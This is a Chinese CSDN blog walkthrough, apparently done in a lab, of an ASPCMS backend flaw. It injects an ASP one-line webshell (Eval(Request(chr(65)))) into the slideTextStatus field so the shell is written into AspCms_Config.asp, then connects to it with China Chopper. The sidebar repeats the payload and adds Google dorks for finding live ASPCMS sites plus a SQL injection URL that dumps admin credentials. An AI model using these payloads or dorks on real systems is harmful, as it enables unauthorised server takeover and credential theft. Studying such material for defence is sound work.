ASPCMS漏洞之文件上传漏洞

最新推荐文章于 2024-12-28 19:17:34 发布
最新推荐文章于 2024-12-28 19:17:34 发布
阅读量537 收藏 5
点赞数 2
分类专栏: CMS 文章标签: web安全 安全 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57240513/article/details/140903501
版权

ASPCMS是由上⾕⽹络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且

⽀持模版⾃定义、⽀持扩展插件等等,能够在短时间内完成 企业建站。

步骤一:访问靶场

访问后台页面——登录后台——填写用户密码,用户名是admin,密码是123456。

后台的地址:/admin_aspcms/login.asp

image-20240804104326798

点击扩展功能——幻灯片设置——点击保存——使用burpsuite抓包

image-20240804104759891

步骤二:抓包修改数据包插入 木马语句。

将抓包后的里面slideTextStatus字段后面改为1%25><%25Eval(Request (chr(65)))%25><%25 ,密码是a。

影响的文件是/config/AspCms_Config.asp

image-20240804105554437

发送到repeter重放器模块,查看修改成功后看到一个地址。

image-20240804110030210

步骤三:使用菜刀连接shell

访问一下地址进行菜刀连接

image-20240804110446369

连接成功

复现 ASPCMS企业建站系统Cookies欺骗漏洞
记录并分享学习安全的知识点..
08-21 1029
ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 ASPCMS2.0存在sql注入注入漏洞,可获得admin管理员用户的cookie值。
漏洞复现】AspCMS commentList.asp SQL注入
失心少年
09-14 1954
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码,进行解密后登录获取敏感数据。1.利用如下POC可获取管理员MD5的密码。
aspcms绕过进入后台
04-11
aspcms绕过进入后台
WEBaspcms漏洞利用
热门推荐
HAPPY
08-18 1万+
【社工方法】(不推荐) 1.首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 的漏洞,果然功夫不负有心人 2.接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password...
ASP-CMS漏洞
mirliasheong的博客
12-28 435
在slideTextStatus=1后面写上%25><%25eval(request(chr(65)))%25><%25。我们在去访问这个文件config/AspCms_Config.asp再去蚁剑连接,连接成功。打开aspcms靶场。
常见cms漏洞ASPCMS
ineedmoreMuQ的博客
08-03 572
漏洞复现,使用后台配置文件拿shell。
0day漏洞aspcms漏洞实战
weixin_49071539的博客
12-16 3719
1. 谷歌搜索关键字 Powered by aspcms.com Copyright ?2010-2011 intitle:Powered by AspCms2 2. 接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 3.
finecms-含有前台文件上传漏洞源码包.zip
01-04
《细解FineCMS前台文件上传漏洞及其源码分析》 FineCMS是一款常见的开源内容管理系统,以其易用性和灵活性深受开发者喜爱。然而,如同其他软件一样,FineCMS也存在潜在的安全问题,其中最为突出的就是前台文件上传...
常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)
2301_76631050的博客
08-04 2044
利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\。猜测web路径: E:\phpstudy_pro\WWW。不要用\,如里要用\\(转义)
文件上传漏洞的思维导图
04-19
11. **利用思路**:攻击者可能通过扫描、会员中心、后台系统、CMS漏洞、代码审计、第三方应用等多种途径寻找和利用文件上传漏洞。 总之,防止文件上传漏洞需要全面的安全策略,包括前端与后端的双重验证、合理的...
修正的ASPCMS投票系统, V2.0版本(已修正IP限制、后台自动登录 去漏洞
03-12
修正的ASPCMS投票系统, V2.0版本(已修正IP限制、后台自动登录 去漏洞
asp 之上传漏洞终结篇
01-02
收藏关于上传漏洞的文章,最近一直遇到这个麻烦, 作者:szjwwwww      出自:黑鹰基地论坛 http://www.3800cc.com 一、写在前面 ***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本*** NC(Netcat) 用于提交 数据包 DOS界面下运行:    NC -vv www.***.com 80<1.txt    -vv: 回显    80:  www端口    1.txt: 就是你要发送的数据包   (更多使用方法请查看本区的帖子)  WSE(WSockExpert)    对本机端口的监视,抓取IE提交的数据包   (不会用的就自己到网上
aspcms爆后台地址
05-17
aspcms爆后台地址,秒杀老版本,修改后台地址一样能跳到真实地址
html文件上传漏洞,文件上传漏洞(绕过姿势)
weixin_31857829的博客
06-07 1614
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿...
文件上传漏洞总结
LiBai__的博客
06-02 1079
黑名单,顾名思义只要出现在名单之中的后缀,都不能上传成功,这就是黑名单的过滤方式。在upload-labs中以上便是一个常见的黑名单写法,下面是在用if语句来验证获得的文件后缀是否在数组里。这种过滤方式的弊端也很明显。如果过滤方式写的不严谨,内容不齐全。根据他的规则,只要没出现在黑名单中的后缀文件都可以上传成功。我们可以借助一些特殊的方式或者后缀。例如解析漏洞、特殊解析后缀php5(达成一些条件,也能解析成php文件)否则,只能利用一些特殊的绕过方法。例如%00截断,::$DATA。
常见CMS漏洞(wordpress,DedeCms,ASPCMS,PHPMyAdmin)
qq_54694921的博客
12-28 682
常见CMS漏洞(wordpress,DedeCms,ASPCMS,PHPMyAdmin保姆级漏洞探测
aspcms 程序漏洞 注入+ cookies欺骗
weixin_30483013的博客
03-26 529
漏洞出现在 /plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转,所以要快,建议用快捷键复制 爆用户名 /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,2...
aspcms投票系统后台插马漏洞
收集盒 Book box
12-21 2360
发布日期:2012-12-12 发布作者:月末 漏洞类型:设计错误 漏洞描述:后台配置文件采用文件写入,未严格过滤导致插入一句话木马。   config.asp内容 %Const SiteName="ASPCMS 开源投票系统 V1.0"             Const ks="0"                         Const xxps="1"
ASPCMS 漏洞详细教程
2201_75891821的博客
08-03 434
将slideTextStatus的值修改为1%25><%25Eval(Request(chr(65)))25><%25 放包(连接密码是a)然后用工具连接 成功连接。
检测文件上传漏洞
最新发布
03-30
<think>好的,我现在需要回答用户关于如何检测Web应用中的文件上传漏洞以及相关工具的问题。首先,我得整理用户提供的引用内容,看看里面有没有有用的信息。 用户给的引用里提到了Xray工具,引用[1]说Xray是一个强大的文件上传漏洞检测工具,能帮助安全团队提高应用安全性。所以Xray应该是一个关键点,需要详细说明。另外,引用[2]提到在目标网站检查中间件、CMS漏洞、编辑器漏洞,扫描上传位置然后验证和绕过。这应该是手动检测方法的一部分。引用[3]和[4]则讲的是绕过检测的方法,比如客户端和服务端的绕过,可能和漏洞检测有关联,但用户主要问的是检测方法和工具,可能需要把这些绕过方法作为检测时需要关注的点。 接下来,我需要把检测方法分为手动和工具两大类。手动检测包括检查上传功能的位置、中间件解析漏洞、CMS漏洞、编辑器漏洞,以及上传后的验证机制。工具方面,Xray是主要的,还可以提Burp Suite用于拦截修改请求,Wfuzz用于模糊测试,OWASP ZAP作为综合工具。 然后要注意引用对应的部分,比如在手动检测的步骤里,提到中间件漏洞和扫描上传位置时,引用[2]和[4]可以作为支持。在工具部分,Xray直接来自引用[1],而Burp Suite的修改Content-Type来自引用[3]。FCK编辑器漏洞则引用[4]。 用户可能还需要知道如何配置工具,比如Xray如何设置FUSE来检测特定漏洞,这里需要参考引用[1]提到的正确配置FUSE的方法。不过用户的问题主要是检测方法和工具推荐,所以可能简要提到配置步骤,但详细配置可能需要进一步的问题。 最后生成相关问题,需要围绕文件上传漏洞的检测工具、手动步骤、配置工具、常见绕过方法以及和解析漏洞的关系来提问。这样用户如果有后续问题,可以继续深入。</think>### 文件上传漏洞检测方法与工具 文件上传漏洞的检测需要结合手动测试与自动化工具,重点关注**上传功能逻辑验证**和**安全防护机制**的完整性。以下是具体步骤和工具推荐: --- #### 一、手动检测方法 1. **定位上传功能** - 扫描目标网站中允许用户上传文件的功能模块(如头像上传、文档提交等),验证其是否对文件类型、扩展名、内容等进行了有效限制[^2]。 2. **中间件与CMS漏洞检测** - 检查服务器中间件(如IIS、Apache)是否存在解析漏洞(例如IIS6.0目录解析漏洞),并验证CMS或编辑器(如FCKeditor)的历史漏洞是否被修复[^2][^4]。 3. **绕过验证测试** - **客户端绕过**:禁用JavaScript或使用Burp Suite拦截请求,修改`Content-Type`字段(如将`image/jpeg`伪装为合法类型)[^3]。 - **服务端绕过**:尝试特殊扩展名(如`.php5`、`.phtml`)、双写后缀(`file.phpphp`)、大小写混淆(`.PhP`)或结合目录解析漏洞(如上传`/a.asp/`目录下的文件)[^3]。 4. **上传后验证** - 检查上传文件是否被重命名、内容是否被过滤,并验证恶意文件是否可执行(如通过直接访问路径触发)。 --- #### 二、自动化检测工具 1. **Xray** - 支持主动扫描文件上传漏洞,可配置FUSE(文件上传安全检查引擎)规则,检测未严格校验文件类型、扩展名或内容的应用[^1]。 - 示例配置:通过代理模式监听流量,针对上传接口设置自定义检测策略。 2. **Burp Suite** - 使用**Repeater**和**Intruder**模块拦截并修改上传请求,测试服务端过滤逻辑(如绕过`Content-Type`检测)。 3. **Wfuzz** - 通过模糊测试(Fuzzing)尝试大量扩展名组合(如`.php`、`.asp`),探测可被解析的危险后缀。 4. **OWASP ZAP** - 集成自动化扫描脚本,检测文件上传功能的常见漏洞模式(如未校验文件头、依赖黑名单机制)。 --- #### 三、防御建议 1. 使用白名单限制文件扩展名和MIME类型。 2. 对上传文件重命名并存储到非Web目录,避免直接解析。 3. 结合内容检测(如文件头校验、图像二次渲染)防止恶意代码嵌入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值